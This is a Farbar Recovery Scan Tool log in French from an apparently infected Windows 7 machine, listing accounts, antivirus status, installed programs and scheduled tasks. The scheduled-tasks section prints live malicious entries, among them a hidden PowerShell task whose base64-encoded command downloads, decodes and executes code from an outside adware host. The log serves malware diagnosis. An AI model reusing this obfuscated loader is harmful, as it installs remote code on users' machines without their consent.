Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version:20-02-2016
Exécuté par S (2016-02-20 23:57:26)
Exécuté depuis C:\Users\S\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2014-02-23 08:02:08)
Mode d'amorçage: Safe Mode (with Networking)
==========================================================


==================== Comptes: =============================

Administrateur (S-1-5-21-3611895705-2825658656-1871142997-500 - Administrator - Disabled)
Invité (S-1-5-21-3611895705-2825658656-1871142997-501 - Limited - Disabled)
S (S-1-5-21-3611895705-2825658656-1871142997-1000 - Administrator - Enabled) => C:\Users\S

==================== Centre de sécurité ========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programmes installés ======================

(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)

3DMark (HKLM-x32\...\{e1e3b41b-1078-4885-a74f-393ca384b1aa}) (Version: 1.2.250.0 - Futuremark)
3DMark (Version: 1.2.250.0 - Futuremark) Hidden
64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\...\{28B941AC-F0F4-8121-EBB6-DD4BBF35080F}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
Batman: Arkham Asylum GOTY Edition (HKLM-x32\...\Steam App 35140) (Version: - Rocksteady Studios)
Canon MG5200 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5200_series) (Version: - )
CD-LabelPrint (HKLM-x32\...\MediaNavigation.CDLabelPrint) (Version: - )
Company of Heroes 2 (HKLM-x32\...\Steam App 231430) (Version: - Relic Entertainment)
Configuration DivX (HKLM-x32\...\DivX Setup) (Version: 2.6.1.8 - DivX, LLC)
Convert AVI to MP4 (HKLM-x32\...\{9ECE13D2-C028-44CB-8A96-A65196E7BBE7}_is1) (Version: - convertavitomp4.com)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd)
DCS World (HKLM-x32\...\Steam App 223750) (Version: - Eagle Dynamics)
Démo de FIFA 16 (HKLM-x32\...\{D09AD1AE-6AAC-45EB-B9F6-C1F223DD8481}) (Version: 1.0.0.0 - Electronic Arts)
Dying Light (HKLM-x32\...\Steam App 239140) (Version: - Techland)
eReg (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
FIFA 16 (HKLM-x32\...\{28FA2805-7992-4A28-844B-040C57204718}) (Version: 1.4.64673.4 - Electronic Arts)
HydraVision (x32 Version: 4.2.252.0 - Advanced Micro Devices, Inc.) Hidden
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1011 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.9.0.1001 - Intel Corporation)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Logiciel d'archivage WinRAR (HKLM-x32\...\WinRAR archiver) (Version: - )
Logitech SetPoint 6.61 (HKLM\...\sp6) (Version: 6.61.15 - Logitech)
Ma-Config.com (64 bits) (HKLM\...\{19D411B5-350C-4DEA-BCA3-9E7B632A642D}) (Version: 7.1.3.1 - Cybelsoft)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{45CD67FD-3218-4207-A0A2-BC41245189E3}) (Version: 1.20.146.0 - Microsoft)
Mozilla Firefox 44.0.2 (x86 fr) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 fr)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2 - Mozilla)
MSVC90_x64 (Version: 1.0.1.2 - Nokia) Hidden
MSVC90_x86 (x32 Version: 1.0.1.2 - Nokia) Hidden
Mumble 1.2.5 (HKLM-x32\...\{F818243E-51A8-418D-8A71-595D5121BECA}) (Version: 1.2.5 - Thorvald Natvig)
Nokia Connectivity Cable Driver (HKLM-x32\...\{A57025CC-5F2E-4D01-B387-06DB10500D43}) (Version: 7.1.78.0 - Nokia)
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
OpenOffice 4.0.1 (HKLM-x32\...\{8D5D54B8-3D29-4AB4-8DA8-1868DAF941D8}) (Version: 4.01.9714 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Package de pilotes Windows - Nokia pccsmcfd LegacyDriver (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia)
PC Connectivity Solution (HKLM-x32\...\{644F4910-E812-49AD-93EC-86828CB81A0D}) (Version: 12.0.27.0 - Nokia)
Pool Nation FX (HKLM-x32\...\Steam App 314000) (Version: - Cherry Pop Games)
Pro Cycling Manager 2015 (HKLM-x32\...\Steam App 322850) (Version: - Cyanide Studio)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.67.1226.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6954 - Realtek Semiconductor Corp.)
Resident Evil 6 / Biohazard 6 (HKLM-x32\...\Steam App 221040) (Version: - Capcom)
Sacred Citadel (HKLM-x32\...\Steam App 207930) (Version: - Southend)
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{87062E99-EBC9-48CA-8D68-EA1D5BD9DA9F}) (Version: 7.0.27.13 - Mad Catz)
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
Tomb Raider (HKLM-x32\...\Steam App 203160) (Version: - Crystal Dynamics)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Wargame: European Escalation (HKLM-x32\...\Steam App 58610) (Version: - Eugen Systems)
Windows Phone app for desktop (HKLM-x32\...\{639E54EE-95CA-4CAE-9779-6BA32D5EAF48}) (Version: 1.1.2726.0 - Microsoft Corporation)

==================== Personnalisé CLSID (Avec liste blanche): ==========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Tâches planifiées (Avec liste blanche) =============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {038ECAE5-4F59-4163-B023-594620E942DF} - System32\Tasks\Tofze => C:\PROGRA~1\SHOPPE~1\Degmueq.bat
Task: {0EEA080F-5E45-41D8-B3D3-AFF16F13795F} - System32\Tasks\{7F7E7A47-0B0C-0F08-0A11-790D7F0A1178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAbwBmAHQAcABpAGMAawBzAG0AYQByAHQALgBjAG8AbQAvAHUALwA/AGEAPQBlAHgAcQBMAC0ARABFAFUAdABGAHYASABNAFEAYwAyAGQAZAB1AC0ASgB2AGIAQQBUAE8ATgBaAF8AagBfAFMARABDADUAWgA5AFMAdwAzAEEAQgBIAFQANABRADcASwBGAE4ANABJAGMAWAA0AFcAawAzAHoATABtAGcAcwBEAFQAQgBEAFkAQQB6AC0AdwBXAFgAeABFADIAeQAzAHIAdwBpADgAUABMADMARwAwADQASQBhAHoANAAyAHgARQBaAEkAVgBxAEYARwBOADIAcQB2AF8AbwBSADUAUwBEAFEAWABGAEQAdQB2AGkAOABwAE0AYgBhAGwAdwAyAEgAYwBaAEYAYgBfAFUASABxAGwAVABGAGsATwB3AG0AQQBJAF8AZwBuAGsAbABwAFoAQgBIAGwASABfAGQAdABSAGcANwBzAEQAUQBZAGEAbQBiAEcAcQBsAGEANQBFAEUAYwBZAG4AeABGAE4AcQA4AE0AYgBHADgATABoADAAZABmADUAMgBPAF8ARQBCADgATQBtADUAVwBIAEkAYQAxAHgAagBjAFoAbgBkAG0AZAB2AHUAZwBzAGEASQBPADIAbQBmAHUAeQBtAEEAdQBYAC0AbQB3ADgANwBRAC0AUwByAFcAMwAyAHAAVwBBAEcARgBiAGwAWgBtAE4ASQB1AFYANwBUAFQAdABOAEsASwBaAGIATgBvAGgAbwBOAFIAQwBGAEYAMgBEAEEANgA5AHcAVgBOAFEAYQBZAHcAXwBjAHQANABqAGsAVQBiAGwAcgBSAHEATgBOAGMAZgBmAEgASwAtAHcAZABpAFAAXwBmAHAAbAB5AGcAZwB1AEsAVQBkAHgAaAAzADcAYwBaADcAVQBPAEsAWgAtAGoAZgBkAFkAeAB1ADkAbgAzAHkAZABtAHIAcgBlAFoANQAzADEASABKAG4AagBFAHoASwBzAEUAZABCAFEAVgA2AE0AZQAxAEMAYwBZAHIAdwB1AGUAMAA2AG4AZgBMAEcATgBFAFoAMQByAFkAMABrAEoASgBBAEEAcwBaAE8AMgBpAGgARwB4AGYAUQAyAEkAUABNAE8AcwBDAEIAZABhAEwAYwBjAEEAcgBQAHkAWQBoAFcARQBZAEIAbABuAEIAQgBRAC0ANgB3ADMAcwBZAHkAUQA1AEwAUAB0ADYANABQAG0ARQBjAEQAVwB5AGkANgBXAGoARABMAGkAagB5AE8AZgBGAEcAWgBzAGsAXwB5AFgAOQByAHYAZwBsAF8AQgBQAHMAWABtAEEAOABhADYAOQBoAGsAeABzAGUAcwBvADMAegA5ADMAQgBKAHMAZAByAHAAegBHADUASwBIAHoARABpAGQAWQBUAFYAWgBNAHUAeABlAGgAMgAwADQAdABYAHcAbABPAEEARQBNAEgAYwBSADAAeAA0AC0ATgB2AHQARwBRAE0AcABwADkAbQBXAGQAdABOAHkAagBoAGcAVgBkAGEARgBUAGUAdQAzAEcAbQB4AGoAegA4AF8AYgBOADcAQwBOAEUALQBfAFIAQwBwAEYAOQAzAFIANwBBAFYAOQB6AEkAMQBoAFQAagBpAEUASABpAFcAeABNAEIAMgBxADUANwB4AFkAWgBMAHgASwBqAGsAUAB1AHcAbwBYAF8AQwAxADgANABVAEQAdAB0ADYAYgBnAHkAegBZAGUAUgBBADAAWABoAGUAUABjAFgAdwBjAFkAQQBxAHkAbgBxAGYAcwBmAC0ANQBmAFcAWAB6AHAAVQA5AFcANQBLADEALQAtAEUALQBrAFkAYwBhAFYAbwBzAEQAQwBiAFoAcQBrAFYAWAAtAHoAeQBkAHYAagA0AFYAdgAwAEkARQBaADAAOQA1AEQAUQBXAHkATgBaAFIAQgBrAGMANQBJAEoAagA0AGcARwBWAEoAaABrAHEAcgBjAEEAcABvAEMAYwBOAG0AcAB5AEIAcgBVADgAMABuAHIAdQA1AHkAZwBXAFgAMQBqAEIARQBDAE8AcgB6AGgAUwBMAGEAMwBTAHcAagB4ADgAQgBuAGoAWQBGAEIAagBBAEMANQBuAEUAZgBIAEoAWAA3AGwAYQBCAFEAZgA4AE4AQgBPAFoAdQBrAGsAQQBKAHAAegBjAEsAWABuAEoALQBBAGcAZgBIAHoAQgBDAGkAVgBxADkASQBwAEUARwBvAGoAQwAmAGMAPQBnAGgANwBTAE0ASQB3AEkATABlADIAbQBnAE4AZAA0AFgAMwBEAFQAMQBSAEMAYQBpAG8ATQBIAEsARwBXADgATQBVADAARgBhAGMATgBRAE4AMgB2AGUAYQBmAGwATAB2AHoAMgA2AFcAUQB2ADMAVgAwAHkAMQBfAEsAWgA2AC0ASABXAEEAMgBFAG4ANABxAFMATABjAFIAegAwAGIATAAyAFYAdwA0ADAAcQBFAFoAawBxAFIAOQBOAEkAbQA1AHcAOQBlAGsARQBtAHMAeQBMAEMAcQBLAE8AdAB2AFoAdQB4AGwAMABEAEQAWQBYAHMAegBTAFYAYQBjAHoAQgA4AGUAWgBmAF8AVgBLAC0AawBDAEQAZQB0ADIAWgBKAGwATABvADgANAA5AGsAcQBSAHMAVwB1AGkAcABJAHQAWgBKAEoAcQBnADAAdwBrAEoAcAB5ADEAbABvAG8AMwA2ADcAXwBoAFYAdABKAFcAZQBPAE0AbAB3AG0AQQBhAHYAdQBvADYARQBwAFMAawBZAHkAcgBOAEcASQBiAG4ARABGAFIANQBHAEQAdAB5ADQAUgB0AE8AUgBVADIAOABEAEoAbABLADAATwByAHEAZgBfAHMAMwBuAHIATQBXAFIANwBZAEMAdwBGAEIAbAA1AE0AXwAwAHgANABnAEsATwBPAEUAUQBaAEgAMABRADgARQBhAFQAbQBtADMAWgBvAHIAUgBQAGcAYwBWAGQAVgBOAEwASwBsAGoANQA4AEoAUQBHADYAcQBVAEwAeAB1AHkASABUAFcAVABoAE0ASwBrAGgAUABfADcAbABxAFQAVgBuAFMAaQA4ADIANABhAEoAZABtAFYAUQBsAEwARgA2AEIAYwBGAGkARgBwAGkANgB5AGsAbQBtAGgARgBTAGMASQByAGYAVgBnAHMATgA0AFkAOQBkAFUAZABtAFAAZgB5AHkAVAA3AG4AOQAxADYAVwBLADAAWQA0ADEAZwBtAEgASQBLAFUAeABOADEAVgBkAEQAQwBaAHQAeQBzAHMAQwA2AGEARwBMAFkAbABBAGYAUgBJAG8AXwBIAEIAMwBqAFgANAB6AGcAbwBjAGEAVwBkAGkAMwBwAFMAOAAtAFEAWgBKADQAdwBuAGcAWQAwADkAbQBMAGwAOQA0AEsAZABxAGQAZABEAFUAdQBXAHYAUgBOAEIAVgB3AGUAXwBHAFEAcABGAEoALQB4AFUAMgB3AFgAMABkAEIAQgBUAEoANAB5AFEANQB2AFAAdABRAGsAWQBGAGkARAB4AGoAVgA0AFAAVgB4AGUAUABRAGoAVwA1AFQAbwBzAG4AZwBJADEAVgBuAHkAaAA3AFoAdAAtAFYAawBKAHgAZQAzADQAbQBLAGQAdABtADgARQAtAFgAVgBOADkAVwBOAE4AdgA5AGoAQgBTAEMAbgBjAHIASQBnAHIAYwB0AFgAawBCAHIAcwBIAFkAbgBaAFIAZQA3AGYAUgAxAEIAVwBtAGYAdQBvAGIALQBqAHgAbwBCAG0AcABRAEYATgBGAFMAcgBaAFQAUQBhAHgAUABMAGQAMAAwAC0ANABqAHgAcwBDAGQAeQBkADQAcwBxAEEAagBwADYAMgBMAFMAawBIAEEARABDAHQASgB2AFkAXwBZADgASABNAFkAeABDAGQAawBJAGEAVwA0AEsAMgB4AFYAOQB5AHYAbgBUADkATgBOADIAagBYAGkAawAxAEkAbABJAFUAdQBEAE4ANwBNAG4AYQBpADkAUQAtAFMARgBCAC0AcwAtAEcAYgB0AGUASwAwAHoARQBuADQAZAA4AEkAegBnAFAAdgBzAG4AMwA4AHgAagBhAHQAYwBtAHYAegB4AE8ARAAyAEoAYwBrADYAYwA0AEwAYQAwAHcAbgA1AG8AcgB3AG8AcwBkAFIAawBQAHIARwBNAEwANQA4ADQAQwB2AG8AcAB6ADAAcQBIAHMAcQBSAHMAYgBSAFcAaQBzAEMAZwB1AEIAYgBJAHoAVAA5AG8AdgBSAEEAWgBGAGoAZwBfAFIANAAxAHEAQQBUAHYAVgBuADAAVQBxAHAAUwBfAGQAOAA1AHoAdgBHAGcAeQByAHUAZABiAFIAbQBIAGIAegBKAHoAaQBfAHcARgBTAFUAMgBmAEIAcgB0AHYAVQB2ADIAcgBwAHYAdQBRAGoASwB3AEkAbQBmAEoAbQA2AF8AWABmAEwAUQBlAFoAcABYAEgARABCAC0AOQB3AGQAYwA0AGoAMwBtADAAYwAtAEcAVABxAHEAdQBBAGkAYgAwAG8ANQBHAEsAbwBkAFcANgAmAHIAPQAxADYAMQAwADIANgAzADMAOQAwADAANgAzADYAMgAyADkANwAyACIAOwAkAHMAdABzAGsAPQAiAHsANwBGADcARQA3AEEANAA3AC0AMABCADAAQwAtADAARgAwADgALQAwAEEAMQAxAC0ANwA5ADAARAA3AEYAMABBADEAMQA3ADgAfQAiADsAJABwAHIAaQBkAD0AIgBEAE4AUwBVAG4AbABvAGMAawBlAHIAIgA7ACQAaQBuAGkAZAA9ACIARwBWAEwAUABMAE0AVQBJACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {2E995896-1403-4B3C-A0CE-08E2CC86CEC8} - System32\Tasks\{C8C5A7B0-140E-4DB7-AE8F-8DAA32E87B74} => pcalua.exe -a C:\ProgramData\Boxore\7.1\Boxore.exe -c --uninstall --finalize --prompt --self-clear --no-loop
